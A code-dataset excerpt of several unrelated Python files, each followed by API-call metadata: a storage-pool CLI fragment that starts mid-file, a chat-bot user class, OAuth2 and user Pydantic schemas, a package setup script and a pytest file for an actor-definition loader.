prefix = "~"
# This is only going to occur if the engine experiences an
# error while calculating a property or if our code has a bug.
else: # pragma: no cover
prefix = "?"
return prefix + code
props_list = [(mopool.HasCache(), "Ca"), (mopool.Encrypted(), "Cr")]
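            # e.g. " Ca,~Cr" -> has a cache, not encrypted (illustrative)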
return ",".join(gen_string(x, y) for x, y in props_list)
format_uuid = (
(lambda mo_uuid: mo_uuid) if namespace.unhyphenated_uuids else to_hyphenated
)
def alert_string(mopool):
"""
Alert information to display, if any
:param mopool: object to access pool properties
:returns: string w/ alert information, "" if no alert
:rtype: str
"""
action_availability = PoolActionAvailability.from_str(
mopool.AvailableActions()
)
error_codes = action_availability.pool_maintenance_error_codes()
return ", ".join(sorted(str(code) for code in error_codes))
tables = [
(
mopool.Name(),
physical_size_triple(mopool),
properties_string(mopool),
format_uuid(mopool.Uuid()),
alert_string(mopool),
)
for mopool in pools_with_props
]
print_table(
["Name", "Total Physical", "Properties", "UUID", "Alerts"],
sorted(tables, key=lambda entry: entry[0]),
["<", ">", ">", ">", "<"],
)
@staticmethod
def destroy_pool(namespace):
"""
Destroy a stratis pool.
If no pool exists, the method succeeds.
:raises StratisCliEngineError:
:raises StratisCliIncoherenceError:
"""
# pylint: disable=import-outside-toplevel
from ._data import Manager, ObjectManager, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
(pool_object_path, _) = next(
pools(props={"Name": namespace.pool_name})
.require_unique_match(True)
.search(managed_objects)
)
((changed, _), return_code, message) = Manager.Methods.DestroyPool(
proxy, {"pool": pool_object_path}
)
# This branch can be covered, since the engine will return an error
# if the pool can not be destroyed because it has filesystems.
if return_code != StratisdErrors.OK:
raise StratisCliEngineError(return_code, message)
if not changed: # pragma: no cover
raise StratisCliIncoherenceError(
(
"Expected to destroy the specified pool %s but "
"stratisd reports that it did not actually "
"destroy the pool requested"
)
% namespace.pool_name
)
@staticmethod
def rename_pool(namespace):
"""
Rename a pool.
:raises StratisCliEngineError:
:raises StratisCliNoChangeError:
"""
# pylint: disable=import-outside-toplevel
from ._data import ObjectManager, Pool, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
(pool_object_path, _) = next(
pools(props={"Name": namespace.current})
.require_unique_match(True)
.search(managed_objects)
)
((changed, _), return_code, message) = Pool.Methods.SetName(
get_object(pool_object_path), {"name": namespace.new}
)
if return_code != StratisdErrors.OK: # pragma: no cover
raise StratisCliEngineError(return_code, message)
if not changed:
raise StratisCliNoChangeError("rename", namespace.new)
@staticmethod
def add_data_devices(namespace): # pylint: disable=too-many-locals
"""
Add specified data devices to a pool.
:raises StratisCliEngineError:
:raises StratisCliIncoherenceError:
:raises StratisCliInUseOtherTierError:
:raises StratisCliInUseSameTierError:
:raises StratisCliPartialChangeError:
"""
# pylint: disable=import-outside-toplevel
from ._data import MODev, ObjectManager, Pool, devs, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
blockdevs = frozenset([os.path.abspath(p) for p in namespace.blockdevs])
_check_opposite_tier(managed_objects, blockdevs, BlockDevTiers.CACHE)
_check_same_tier(
namespace.pool_name, managed_objects, blockdevs, BlockDevTiers.DATA
)
(pool_object_path, _) = next(
pools(props={"Name": namespace.pool_name})
.require_unique_match(True)
.search(managed_objects)
)
((added, devs_added), return_code, message) = Pool.Methods.AddDataDevs(
get_object(pool_object_path), {"devices": list(blockdevs)}
)
if return_code != StratisdErrors.OK: # pragma: no cover
raise StratisCliEngineError(return_code, message)
if not added or len(devs_added) < len(blockdevs): # pragma: no cover
devnodes_added = [
MODev(info).Devnode()
for (object_path, info) in devs(
props={"Pool": pool_object_path}
).search(ObjectManager.Methods.GetManagedObjects(proxy, {}))
if object_path in devs_added
]
raise StratisCliIncoherenceError(
(
"Expected to add the specified blockdevs to the data tier "
"in pool %s but stratisd reports that it did not actually "
"add some or all of the blockdevs requested; devices "
"added: (%s), devices requested: (%s)"
)
% (namespace.pool_name, ", ".join(devnodes_added), ", ".join(blockdevs))
)
@staticmethod
def add_cache_devices(namespace): # pylint: disable=too-many-locals
"""
Add specified cache devices to a pool.
:raises StratisCliEngineError:
:raises StratisCliIncoherenceError:
:raises StratisCliInUseOtherTierError:
:raises StratisCliInUseSameTierError:
:raises StratisCliPartialChangeError:
"""
# pylint: disable=import-outside-toplevel
from ._data import MODev, ObjectManager, Pool, devs, pools
proxy = get_object(TOP_OBJECT)
managed_objects = ObjectManager.Methods.GetManagedObjects(proxy, {})
blockdevs = frozenset([os.path.abspath(p) for p in namespace.blockdevs])
_check_opposite_tier(managed_objects, blockdevs, BlockDevTiers.DATA)
_check_same_tier(
namespace.pool_name, managed_objects, blockdevs, BlockDevTiers.CACHE
)
(pool_object_path, _) = next(
pools(props={"Name": namespace.pool_name})
.require_unique_match(True)
.search(managed_objects)
)
((added, devs_added), return_code, message) = Pool.Methods.AddCacheDevs(
get_object(pool_object_path), {"devices": list(blockdevs)}
)
if return_code != StratisdErrors.OK:
raise StratisCliEngineError(return_code, message)
if not added or len(devs_added) < len(blockdevs): # pragma: no cover
devnodes_added = [
MODev(info).Devnode()
for (object_path, info) in devs(
props={"Pool": pool_object_path}
).search(ObjectManager.Methods.GetManagedObjects(proxy, {}))
if object_path in devs_added
]
raise StratisCliIncoherenceError(
(
"Expected to add the specified blockdevs to the cache tier "
"in pool %s but stratisd reports that it did not actually "
"add some or all of the blockdevs requested; devices "
"added: (%s), devices requested: (%s)"
)
% (namespace.pool_name, ", ".join(devnodes_added), ", ".join(blockdevs))
)
@staticmethod
def unlock_pools(namespace):
"""
Unlock all of the encrypted pools that have been detected by the daemon
but are still locked.
:raises StratisCliIncoherenceError:
:raises StratisCliNoChangeError:
:raises StratisCliAggregateError:
"""
# pylint: disable=import-outside-toplevel
from ._data import Manager
proxy = get_object(TOP_OBJECT)
locked_pools = _fetch_locked_pools_property(proxy)
if locked_pools == {}: # pragma: no cover
raise StratisCliNoChangeError("unlock", "pools")
# This block is not covered as the sim engine does not simulate the
# management of unlocked devices, so locked_pools is always empty.
errors = [] # pragma: no cover
for uuid in locked_pools: # pragma: no cover
(
(is_some, unlocked_devices),
return_code,
message,
) = Manager.Methods.UnlockPool(
proxy, {"pool_uuid": uuid, "unlock_method": namespace.unlock_method}
)
if return_code != StratisdErrors.OK:
errors.append(
StratisCliPartialFailureError(
"unlock", "pool with UUID %s" % uuid, error_message=message
)
)
if is_some and unlocked_devices == []:
raise StratisCliIncoherenceError(
(
"stratisd reported that some existing devices are locked but "
"no new devices were unlocked during this operation"
)
)
if errors != []: # pragma: no cover
raise StratisCliAggregateError("unlock", "pool", errors)
@staticmethod
def explain_code(namespace):
"""
Print an explanation of pool error code.
"""
error_code = PoolMaintenanceErrorCode.from_str(namespace.code)
assert error_code is not None
print(error_code.explain())
| [((64, 25, 64, 42), 'collections.defaultdict', 'defaultdict', ({(64, 37, 64, 41): 'list'}, {}), '(list)', False, 'from collections import defaultdict\n'), ((176, 31, 176, 49), 'os.path.abspath', 'os.path.abspath', ({(176, 47, 176, 48): 'p'}, {}), '(p)', False, 'import os\n'), ((234, 31, 234, 49), 'os.path.abspath', 'os.path.abspath', ({(234, 47, 234, 48): 'p'}, {}), '(p)', False, 'import os\n'), ((452, 31, 452, 49), 'os.path.abspath', 'os.path.abspath', ({(452, 47, 452, 48): 'p'}, {}), '(p)', False, 'import os\n'), ((507, 31, 507, 49), 'os.path.abspath', 'os.path.abspath', ({(507, 47, 507, 48): 'p'}, {}), '(p)', False, 'import os\n')] |
Esenin/telegram_vk_pipe_bot | synchrobot/chat_user.py | db92fe062a121beebbc386975660d5a76f1b396c | # -*- coding: utf-8 -*-
# Author: Ivan Senin
import calendar
import time
import datetime as dt
import json
class User(object):
def __init__(self, id, name, last_seen, want_time, muted, username="", additional_keys="{}"):
super(User, self).__init__()
self.id = id
self.name = name
self.username = username
self._last_seen = last_seen
self._want_time = want_time
self._muted = muted
self.dirty = True
self.other_keys = json.loads(additional_keys) if additional_keys else {}
def get_seen(self): return self._last_seen
def set_seen(self, seen):
self._last_seen = seen
self.dirty = True
last_seen = property(get_seen, set_seen)
def get_want_time(self): return self._want_time
def set_want_time(self, new_val):
self._want_time = new_val
self.dirty = True
want_time = property(get_want_time, set_want_time)
def get_muted(self): return self._muted
def set_muted(self, new_val):
self._muted = new_val
self.dirty = True
muted = property(get_muted, set_muted)
def update_seen_time(self):
self.last_seen = calendar.timegm(time.gmtime())
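		# calendar.timegm(time.gmtime()) is the current UTC time as a Unix timestamp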
def __str__(self):
seen_str = dt.datetime.fromtimestamp(self.last_seen).strftime('%Y-%m-%d %H:%M:%S')
return "User: ({0}{1}, id: {2}, last_seen: {3}, want_time: {4}, muted: {5})".format(
self.name.encode('utf-8'), " (" + self.username + ")" if self.username else "", self.id, seen_str,
self.want_time, self.muted)
def serialized_keys(self):
return json.dumps(self.other_keys)
| [((54, 9, 54, 36), 'json.dumps', 'json.dumps', ({(54, 20, 54, 35): 'self.other_keys'}, {}), '(self.other_keys)', False, 'import json\n'), ((19, 20, 19, 47), 'json.loads', 'json.loads', ({(19, 31, 19, 46): 'additional_keys'}, {}), '(additional_keys)', False, 'import json\n'), ((44, 35, 44, 48), 'time.gmtime', 'time.gmtime', ({}, {}), '()', False, 'import time\n'), ((47, 13, 47, 54), 'datetime.datetime.fromtimestamp', 'dt.datetime.fromtimestamp', ({(47, 39, 47, 53): 'self.last_seen'}, {}), '(self.last_seen)', True, 'import datetime as dt\n')] |
Felipe-Renck/contaxy | backend/src/contaxy/schema/auth.py | 532d1f01aad1ea8155bc10216acedca601d37889 | from datetime import datetime, timezone
from enum import Enum
from typing import Dict, List, Optional
import pydantic
from fastapi import HTTPException, Path, status
from pydantic import BaseModel, EmailStr, Field
from contaxy.schema.exceptions import ClientValueError
from contaxy.schema.shared import MAX_DESCRIPTION_LENGTH
from contaxy.utils.fastapi_utils import as_form
USERS_KIND = "users"
ADMIN_ROLE = "roles/admin"
USER_ROLE = "roles/user"
class AccessLevel(str, Enum):
# Map to: select, insert, update, delete
READ = "read" # Viewer, view: Allows admin access , Can only view existing resources. Permissions for read-only actions that do not affect state, such as viewing (but not modifying) existing resources or data.
WRITE = "write" # Editor, edit, Contributor : Allows read/write access , Can create and manage all types of resources but can’t grant access to others. All viewer permissions, plus permissions for actions that modify state, such as changing existing resources.
ADMIN = "admin" # Owner : Allows read-only access. Has full access to all resources including the right to edit IAM, invite users, edit roles. All editor permissions and permissions for the following actions
# UNKNOWN = "unknown" # Deny?
@classmethod
def load(cls, access_level: str) -> "AccessLevel":
try:
return cls(access_level.strip().lower())
except ValueError:
raise ClientValueError(f"Access level is unknown {access_level}")
# return cls.UNKNOWN
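    # e.g. AccessLevel.load(" Write ") == AccessLevel.WRITE; unrecognized strings raise ClientValueError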
class TokenPurpose(str, Enum):
USER_API_TOKEN = "user-api-token"
PROJECT_API_TOKEN = "project-api-token"
SERVICE_ACCESS_TOKEN = "service-access-token"
LOGIN_TOKEN = "login-token"
REFRESH_TOKEN = "refresh-token" # For user sessions
# DEPLOYMENT_TOKEN = "deployment-token"
contaxy_token_purposes = {purpose for purpose in TokenPurpose}
class TokenType(str, Enum):
SESSION_TOKEN = "session-token"
API_TOKEN = "api-token"
class AccessToken(BaseModel):
token: str = Field(
...,
example="f4528e540a133dd53ba6809e74e16774ebe4777a",
description="API Token.",
)
token_type: TokenType = Field(
...,
example=TokenType.API_TOKEN,
description="The type of the token.",
)
subject: str = Field(
...,
example="users/dklqmomr2c8dx9cpb202dsqku",
description="Identifies the principal that is the subject of the token. Usually refers to the user to which the token is issued to.",
)
scopes: List[str] = Field(
...,
example=["projects#read"],
description="List of scopes associated with the token.",
)
created_at: Optional[datetime] = Field(
None,
description="Creation date of the token.",
)
expires_at: Optional[datetime] = Field(
None,
example="2021-04-25T10:20:30.400+02:30",
description="Date at which the token expires and, thereby, gets revoked.",
)
class ApiToken(AccessToken):
description: Optional[str] = Field(
None,
example="Token used for accesing project resources on my local machine.",
max_length=MAX_DESCRIPTION_LENGTH,
description="Short description about the context and usage of the token.",
)
created_by: Optional[str] = Field(
None,
example="16fd2706-8baf-433b-82eb-8c7fada847da",
description="ID of the user that created this token.",
)
token_purpose: Optional[str] = Field(
None,
example=TokenPurpose.LOGIN_TOKEN,
description="The purpose of the token.",
)
class AuthorizedAccess(BaseModel):
authorized_subject: str
resource_name: Optional[str] = None
access_level: Optional[AccessLevel] = None
access_token: Optional[AccessToken] = None
# Oauth Specific Code
class OAuth2TokenGrantTypes(str, Enum):
PASSWORD = "password"
REFRESH_TOKEN = "refresh_token"
CLIENT_CREDENTIALS = "client_credentials"
AUTHORIZATION_CODE = "authorization_code"
# TODO: Replaced with pydantic class
# class OAuth2TokenRequestForm:
# """OAuth2 Token Endpoint Request Form."""
# def __init__(
# self,
# grant_type: OAuth2TokenGrantTypes = Form(
# ...,
# description="Grant type. Determines the mechanism used to authorize the creation of the tokens.",
# ),
# username: Optional[str] = Form(
# None, description="Required for `password` grant type. The user’s username."
# ),
# password: Optional[str] = Form(
# None, description="Required for `password` grant type. The user’s password."
# ),
# scope: Optional[str] = Form(
# None,
# description="Scopes that the client wants to be included in the access token. List of space-delimited, case-sensitive strings",
# ),
# client_id: Optional[str] = Form(
# None,
# description="The client identifier issued to the client during the registration process",
# ),
# client_secret: Optional[str] = Form(
# None,
# description=" The client secret. The client MAY omit the parameter if the client secret is an empty string.",
# ),
# code: Optional[str] = Form(
# None,
# description="Required for `authorization_code` grant type. The value is what was returned from the authorization endpoint.",
# ),
# redirect_uri: Optional[str] = Form(
# None,
# description="Required for `authorization_code` grant type. Specifies the callback location where the authorization was sent. This value must match the `redirect_uri` used to generate the original authorization_code.",
# ),
# refresh_token: Optional[str] = Form(
# None,
# description="Required for `refresh_token` grant type. The refresh token previously issued to the client.",
# ),
# state: Optional[str] = Form(
# None,
# description="An opaque value used by the client to maintain state between the request and callback. The parameter SHOULD be used for preventing cross-site request forgery.",
# ),
# set_as_cookie: Optional[bool] = Form(
# False,
# description="If `true`, the access (and refresh) token will be set as cookie instead of the response body.",
# ),
# ):
# self.grant_type = grant_type
# self.username = username
# self.password = password
# self.scopes = []
# if scope:
# self.scopes = str(scope).split()
# self.client_id = client_id
# self.client_secret = client_secret
# self.code = code
# self.redirect_uri = redirect_uri
# self.refresh_token = refresh_token
# self.state = state
# self.set_as_cookie = set_as_cookie
@as_form
class OAuth2TokenRequestFormNew(BaseModel):
"""OAuth2 Token Endpoint Request Form."""
grant_type: OAuth2TokenGrantTypes = Field(
...,
description="Grant type. Determines the mechanism used to authorize the creation of the tokens.",
)
username: Optional[str] = Field(
None, description="Required for `password` grant type. The user’s username."
)
password: Optional[str] = Field(
None, description="Required for `password` grant type. The user’s password."
)
scope: Optional[str] = Field(
None,
description="Scopes that the client wants to be included in the access token. List of space-delimited, case-sensitive strings",
)
client_id: Optional[str] = Field(
None,
description="The client identifier issued to the client during the registration process",
)
client_secret: Optional[str] = Field(
None,
description=" The client secret. The client MAY omit the parameter if the client secret is an empty string.",
)
code: Optional[str] = Field(
None,
description="Required for `authorization_code` grant type. The value is what was returned from the authorization endpoint.",
)
redirect_uri: Optional[str] = Field(
None,
description="Required for `authorization_code` grant type. Specifies the callback location where the authorization was sent. This value must match the `redirect_uri` used to generate the original authorization_code.",
)
refresh_token: Optional[str] = Field(
None,
description="Required for `refresh_token` grant type. The refresh token previously issued to the client.",
)
state: Optional[str] = Field(
None,
description="An opaque value used by the client to maintain state between the request and callback. The parameter SHOULD be used for preventing cross-site request forgery.",
)
set_as_cookie: Optional[bool] = Field(
False,
description="If `true`, the access (and refresh) token will be set as cookie instead of the response body.",
)
class OAuthToken(BaseModel):
token_type: str = Field(
..., description="The type of token this is, typically just the string `bearer`"
)
access_token: str = Field(..., description="The access token string.")
expires_in: Optional[int] = Field(
None,
description="The expiration time of the access token in seconds.",
)
refresh_token: Optional[str] = Field(
None, description="API token to refresh the sesion token (if it expires)."
)
scope: Optional[str] = Field(
None, description="The scopes contained in the access token."
)
id_token: Optional[str] = Field(
None,
description="OpenID Connect ID Token that encodes the user’s authentication information.",
)
class OAuthTokenIntrospection(BaseModel):
active: bool = Field(
...,
description="Indicator of whether or not the presented token is currently active.",
)
scope: Optional[str] = Field(
None,
description="A space-delimited list of scopes.",
)
client_id: Optional[str] = Field(
None,
description="Client identifier for the OAuth 2.0 client that requested this token.",
)
username: Optional[str] = Field(
None,
description="Human-readable identifier for the resource owner who authorized this token.",
)
token_type: Optional[str] = Field(
None,
description="Type of the token as defined in Section 5.1 of OAuth 2.0 [RFC6749].",
)
exp: Optional[int] = Field(
None,
description="Timestamp, measured in the number of seconds since January 1 1970 UTC, indicating when this token will expire, as defined in JWT [RFC7519].",
)
iat: Optional[int] = Field(
None,
description="Timestamp, measured in the number of seconds since January 1 1970 UTC, indicating when this token was originally issued, as defined in JWT [RFC7519].",
)
nbf: Optional[int] = Field(
None,
description="Timestamp, measured in the number of seconds since January 1 1970 UTC, indicating when this token is not to be used before, as defined in JWT [RFC7519].",
)
sub: Optional[str] = Field(
None,
description="Subject of the token, as defined in JWT [RFC7519]. Usually a machine-readable identifier of the resource owner who authorized this token.",
)
aud: Optional[str] = Field(
None,
description="Service-specific string identifier or list of string identifiers representing the intended audience for this token, as defined in JWT [RFC7519].",
)
iss: Optional[str] = Field(
None,
description="String representing the issuer of this token, as defined in JWT [RFC7519].",
)
jti: Optional[str] = Field(
None,
description="String identifier for the token, as defined in JWT [RFC7519].",
)
uid: Optional[str] = Field(
None,
description="The user ID. This parameter is returned only if the token is an access token and the subject is an end user.",
)
class AuthorizeResponseType(str, Enum):
TOKEN = "token"
CODE = "code"
class OAuth2ErrorDetails(BaseModel):
error: str
class OAuth2Error(HTTPException):
"""Basic exception for OAuth errors.
Implements the [RFC6749 error response](https://tools.ietf.org/html/rfc6749#section-5.2).
"""
def __init__(
self,
error: str,
) -> None:
"""Initializes the exception.
Args:
error: A single ASCII error code from the ones defined in RFC6749.
"""
super(OAuth2Error, self).__init__(
status_code=status.HTTP_400_BAD_REQUEST,
detail=error,
)
# TODO: Not used right now
# class OAuth2AuthorizeRequestForm:
# """OAuth2 Authorize Endpoint Request Form."""
# def __init__(
# self,
# response_type: AuthorizeResponseType = Form(
# ...,
# description="Either code for requesting an authorization code or token for requesting an access token (implicit grant).",
# ),
# client_id: Optional[str] = Form(
# None, description="The public identifier of the client."
# ),
# redirect_uri: Optional[str] = Form(None, description="Redirection URL."),
# scope: Optional[str] = Form(
# None, description="The scope of the access request."
# ),
# state: Optional[str] = Form(
# None,
# description="An opaque value used by the client to maintain state between the request and callback. The parameter SHOULD be used for preventing cross-site request forgery",
# ),
# nonce: Optional[str] = Form(None),
# ):
# self.response_type = response_type
# self.client_id = client_id
# self.redirect_uri = redirect_uri
# self.scope = scope
# self.state = state
# self.nonce = nonce
USER_ID_PARAM = Path(
...,
title="User ID",
description="A valid user ID.",
# TODO: add length restriction
)
# User Models
class UserBase(BaseModel):
username: Optional[str] = Field(
None,
example="john-doe",
description="A unique username on the system.",
) # nickname
email: Optional[EmailStr] = Field(
None, example="[email protected]", description="User email address."
)
disabled: bool = Field(
False,
description="Indicates that user is disabled. Disabling a user will prevent any access to user-accessible resources.",
)
class UserInput(UserBase):
pass
class UserRegistration(UserInput):
# The password is only part of the user input object and should never returned
# TODO: a password can only be changed when used via oauth password bearer
# TODO: System admin can change passwords for all users
password: Optional[str] = Field(
None,
description="Password for the user. The password will be stored in as a hash.",
)
class User(UserBase):
id: str = Field(
...,
example="16fd2706-8baf-433b-82eb-8c7fada847da",
description="Unique ID of the user.",
)
technical_user: bool = Field(
False,
description="Indicates if the user is a technical user created by the system.",
)
created_at: datetime = Field(
default_factory=lambda: datetime.now(timezone.utc),
description="Timestamp of the user creation. Assigned by the server and read-only.",
)
last_activity: datetime = Field(
None, # If none the validator below will set last_activity to the create_at time
description="Last time the user accessed the system. Right now this is only updated when the user "
"calls the /users/me endpoint so that call should always be done when the user loads the UI.",
)
@pydantic.validator("last_activity", pre=True, always=True)
def default_last_activity(cls, v: datetime, *, values: Dict) -> datetime:
return v if v is not None else values["created_at"]
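        # i.e. a missing last_activity defaults to the account creation time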
has_password: bool = Field(
True,
description="Indicates if the user log in with password or SSO",
)
| [((369, 16, 374, 1), 'fastapi.Path', 'Path', (), '', False, 'from fastapi import HTTPException, Path, status\n'), ((54, 17, 58, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((59, 28, 63, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((64, 19, 68, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((69, 24, 73, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((74, 37, 77, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((78, 37, 82, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((86, 33, 91, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((92, 32, 96, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((97, 35, 101, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((187, 40, 190, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((191, 30, 193, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((194, 30, 196, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((197, 27, 200, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((201, 31, 204, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((205, 35, 208, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((209, 26, 212, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((213, 34, 216, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((217, 35, 220, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((221, 27, 224, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((225, 36, 228, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((232, 22, 234, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((235, 24, 235, 74), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((236, 32, 239, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((240, 35, 242, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((243, 27, 245, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((246, 30, 249, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((253, 19, 256, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((257, 27, 260, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((261, 31, 264, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((265, 30, 268, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import 
BaseModel, EmailStr, Field\n'), ((269, 32, 272, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((273, 25, 276, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((277, 25, 280, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((281, 25, 284, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((285, 25, 288, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((289, 25, 292, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((293, 25, 296, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((297, 25, 300, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((301, 25, 304, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((379, 30, 383, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((384, 32, 386, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((387, 21, 390, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((401, 30, 404, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((408, 14, 412, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((413, 27, 416, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((421, 30, 425, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((427, 5, 427, 63), 'pydantic.validator', 'pydantic.validator', (), '', False, 'import pydantic\n'), ((431, 25, 434, 5), 'pydantic.Field', 'Field', (), '', False, 'from pydantic import BaseModel, EmailStr, Field\n'), ((32, 18, 32, 77), 'contaxy.schema.exceptions.ClientValueError', 'ClientValueError', ({(32, 35, 32, 76): 'f"""Access level is unknown {access_level}"""'}, {}), "(f'Access level is unknown {access_level}')", False, 'from contaxy.schema.exceptions import ClientValueError\n'), ((418, 32, 418, 58), 'datetime.datetime.now', 'datetime.now', ({(418, 45, 418, 57): 'timezone.utc'}, {}), '(timezone.utc)', False, 'from datetime import datetime, timezone\n')] |
richarddwang/hugdatafast | setup.py | 714ebac89cb6c616a53ec5da50d0c1c50c6f2a3e | import setuptools
from hugdatafast.__init__ import __version__
with open("README.md", "r") as fh:
long_description = fh.read()
REQUIRED_PKGS = [
'fastai>=2.0.8',
    'fastcore>=1.0.1',  # change of store_attr api
'datasets',
]
setuptools.setup(
name="hugdatafast",
version=__version__,
author="Richard Wang",
author_email="[email protected]",
description="The elegant bridge between hugginface data and fastai",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/richarddwang/hugdatafast",
license='Apache 2.0',
packages=setuptools.find_packages(),
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Programming Language :: Python :: 3",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
],
python_requires='>=3.6',
install_requires=REQUIRED_PKGS,
keywords='datasets machine learning datasets metrics fastai huggingface',
) | [((23, 13, 23, 39), 'setuptools.find_packages', 'setuptools.find_packages', ({}, {}), '()', False, 'import setuptools\n')] |
drehak/leapp | tests/scripts/test_repository_actor_definition.py | 062c76859e6b4a68592c6a387e44a2c1d36949ff | import pytest
from leapp.repository.actor_definition import ActorDefinition, ActorInspectionFailedError, MultipleActorsError
from leapp.exceptions import UnsupportedDefinitionKindError
from leapp.repository import DefinitionKind
from helpers import repository_dir
import logging
import mock
_FAKE_META_DATA = {
'description': 'Fake Description',
'class_name': 'FakeActor',
'name': 'fake-actor',
'path': 'actors/test',
'tags': (),
'consumes': (),
'produces': (),
'dialogs': (),
}
def test_actor_definition(repository_dir):
with repository_dir.as_cwd():
logger = logging.getLogger('leapp.actor.test')
with mock.patch.object(logger, 'log') as log_mock:
definition = ActorDefinition('actors/test', '.', log=log_mock)
for kind in set(DefinitionKind.REPO_WHITELIST + DefinitionKind.ACTOR_WHITELIST):
if kind in DefinitionKind.ACTOR_WHITELIST:
definition.add(kind, '.')
else:
with pytest.raises(UnsupportedDefinitionKindError):
definition.add(kind, '.')
log_mock.error.assert_called_with(
"Attempt to add item type %s to actor that is not supported", kind.name)
log_mock.reset_mock()
with mock.patch('leapp.repository.actor_definition.get_actor_metadata', return_value=_FAKE_META_DATA):
with mock.patch('leapp.repository.actor_definition.get_actors', return_value=[True]):
definition._module = True
assert definition.consumes == _FAKE_META_DATA['consumes']
assert definition.produces == _FAKE_META_DATA['produces']
assert definition.tags == _FAKE_META_DATA['tags']
assert definition.class_name == _FAKE_META_DATA['class_name']
assert definition.dialogs == _FAKE_META_DATA['dialogs']
assert definition.name == _FAKE_META_DATA['name']
assert definition.description == _FAKE_META_DATA['description']
dumped = definition.dump()
assert dumped.pop('path') == _FAKE_META_DATA['path']
assert dumped.pop('name') == definition.name
assert dumped.pop('files') == ('.',)
assert dumped.pop('libraries') == ('.',)
assert dumped.pop('tests') == ('.',)
assert dumped.pop('tools') == ('.',)
# Assert to ensure we covered all keys
assert not dumped
with pytest.raises(ActorInspectionFailedError):
with mock.patch('leapp.repository.actor_definition.get_actors', return_value=[]):
definition._discovery = None
definition.discover()
